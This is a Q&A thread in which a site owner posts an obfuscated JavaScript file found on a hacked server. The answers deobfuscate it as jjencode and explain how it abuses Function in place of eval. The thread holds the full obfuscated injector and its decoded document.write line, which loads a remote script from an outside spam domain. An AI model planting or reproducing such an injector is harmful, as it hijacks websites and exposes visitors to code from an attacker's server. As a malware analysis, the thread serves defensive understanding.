Very interesting Javascript Obfuscation. Help understanding it

Question

Very interesting Javascript Obfuscation. Help understanding it

854 views Asked by user1914191 At 12 December 2013 at 04:29

I found out one of my sites was hacked, and upon investigation, I looked at a javasript file that was uploaded and I couldn't believe that it actually served a purpose due to the insane obfuscation.

I'm so intrigued with it that I need to know how the hell this even works. If anyone can provide any information that is greatly appreciated! Plus this will help me find out other hidden hacked files on my server!

Here are the contents:

$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"=\\\\\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"://"+$.$$_$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.$$_+$._$$+"-\\"+$.__$+$.$$_+$._$$+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$$_+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.___+$._$+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"."+$.$$__+$._$+"\\"+$.__$+$.$_$+$.$_$+"/\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.__$+$.$$_+$._$$+"/"+$.__+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+$.$$_$+$._$+(![]+"")[$._$_]+"/\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$_$+$.__$+$.$$_$+$.$$$_+$.$_$$+$.$_$_+"\\"+$.__$+$.$$_+$._$_+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\\\\\"></\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+">\\\");"+"\"")())();

Original Q&A

There are 2 answers

**sbking** · Answer 1 · 2013-12-12 04:36:12

sbking On 12 December 2013 at 04:36

I ran it in the console - it seems to replace the website's HTML with spam links trying to sell drugs - "Generic Viagra $108" etc.

enter image description here

**Paul Draper** · Answer 2 · 2013-12-12 04:47:29

First, add some whitespace:

$ = ~ [];
$ = {
    ___: ++$,
    $$$$: (![] + "")[$],
    __$: ++$,
    $_$_: (![] + "")[$],
    _$_: ++$,
    $_$$: ({} + "")[$],
    $$_$: ($[$] + "")[$],
    _$$: ++$,
    $$$_: (!"" + "")[$],
    $__: ++$,
    $_$: ++$,
    $$__: ({} + "")[$],
    $$_: ++$,
    $$$: ++$,
    $___: ++$,
    $__$: ++$
};
$.$_ = ($.$_ = $ + "")[$.$_$]
    + ($._$ = $.$_[$.__$])
    + ($.$$ = ($.$ + "")[$.__$])
    + ((!$) + "")[$._$$]
    + ($.__ = $.$_[$.$$_])
    + ($.$ = (!"" + "")[$.__$])
    + ($._ = (!"" + "")[$._$_])
    + $.$_[$.$_$]
    + $.__
    + $._$
    + $.$;
$.$$ = $.$
    + (!"" + "")[$._$$]
    + $.__
    + $._
    + $.$
    + $.$$;
$.$ = ($.___)[$.$_][$.$_];
$.$($.$(
    $.$$
    + "\"" + $.$$_$ + $._$ + $.$$__ + $._
    + "\\" + $.__$ + $.$_$ + $.$_$ + $.$$$_
    + "\\" + $.__$ + $.$_$ + $.$$_ + $.__
    + ".\\" + $.__$ + $.$$_ + $.$$$
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.__$ + $.__ + $.$$$_
    + "(\\\"<\\" + $.__$ + $.$$_ + $._$$ + $.$$__
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.__$
    + "\\" + $.__$ + $.$$_ + $.___ + $.__
    + "\\" + $.$__ + $.___
    + "\\" + $.__$ + $.$$_ + $._$$
    + "\\" + $.__$ + $.$$_ + $._$_ + $.$$__
    + "=\\\\\\\"\\" + $.__$ + $.$_$ + $.___ + $.__ + $.__
    + "\\" + $.__$ + $.$$_ + $.___ + "://" + $.$$_$
    + "\\" + $.__$ + $.$_$ + $.$$_
    + "\\" + $.__$ + $.$$_ + $._$$
    + "-\\" + $.__$ + $.$$_ + $._$$ + $.$$$_
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$$_ + $.$$_ + $.$$$_
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.___ + $._$
    + "\\" + $.__$ + $.$_$ + $.$_$ + $.$$$_ + "." + $.$$__ + $._$
    + "\\" + $.__$ + $.$_$ + $.$_$
    + "/\\" + $.__$ + $.$$_ + $._$$ + $.$$__
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.__$
    + "\\" + $.__$ + $.$$_ + $.___ + $.__
    + "\\" + $.__$ + $.$$_ + $._$$
    + "/" + $.__
    + "\\" + $.__$ + $.$$_ + $._$_ + $.$_$_
    + "\\" + $.__$ + $.$_$ + $.$_$ + $.$_$_ + $.$$_$ + $._$ + (![] + "")[$._$_]
    + "/\\" + $.__$ + $.$$_ + $._$$ + "\\" + $.__$ + $.$_$ + $.__$ + $.$$_$ + $.$$$_ + $.$_$$ + $.$_$_
    + "\\" + $.__$ + $.$$_ + $._$_ + ".\\" + $.__$ + $.$_$ + $._$_
    + "\\" + $.__$ + $.$$_ + $._$$
    + "\\\\\\\"></\\"
    + $.__$ + $.$$_ + $._$$ + $.$$__
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.__$
    + "\\" + $.__$ + $.$$_ + $.___ + $.__
    + ">\\\");"
    + "\""
)())();

1. Everything but the last statement is creating the object $ whose values are mostly numbers and strings, like "f", 8, and "return".

Of particular significance, however, is $.$ , which is Function. Calling Function(s) creates a function whose body is s.

For example, Function('return 1;') returns function() { return 1; }.

Essentially, Function(s)() (or in this case, $.$(s)()) is the equivalent of eval(s).

2. All the string concatenations in that last statement create a string.

return"docu\155e\156t.\167\162\151te(\"<\163c\162\151\160t\40\163\162c=\\\"\150tt\160://d\156\163-\163e\162\166e\162\150o\155e.co\155/\163c\162\151\160t\163/t\162a\155adol/\163\151deba\162.\152\163\\\"></\163c\162\151\160t>\");\"

3. which when evaluated with $.$ returns as a string

document.write("<script src=\"http://dns-serverhome.com/scripts/tramadol/sidebar.js\"></script>");

4. Calling $.$ a second time on this result completes the attack.

This code is clearly intended to appear as innocuous as possible, by not using eval, Function, function, or any HTML entities like <.

The double call to Function that IMO are not necessary, but I suppose it further obfuscates the code.

Now, as to you final question, do you intend to be running 3rd party Javascript? If so, the only robust framework I know of for something like that is Google Caja.

EDIT: This appears to be the result of jjencode for

document.write("<script src=\"http://dns-serverhome.com/scripts/tramadol/sidebar.js\"></script>");

jjencode even has the option to return a palindromic obfuscation.

TechQA.

Very interesting Javascript Obfuscation. Help understanding it

There are 2 answers

Related Questions in JAVASCRIPT

Related Questions in SECURITY

Related Questions in OBFUSCATION

Related Questions in DEOBFUSCATION

Popular Questions

Popular Tags

Trending Questions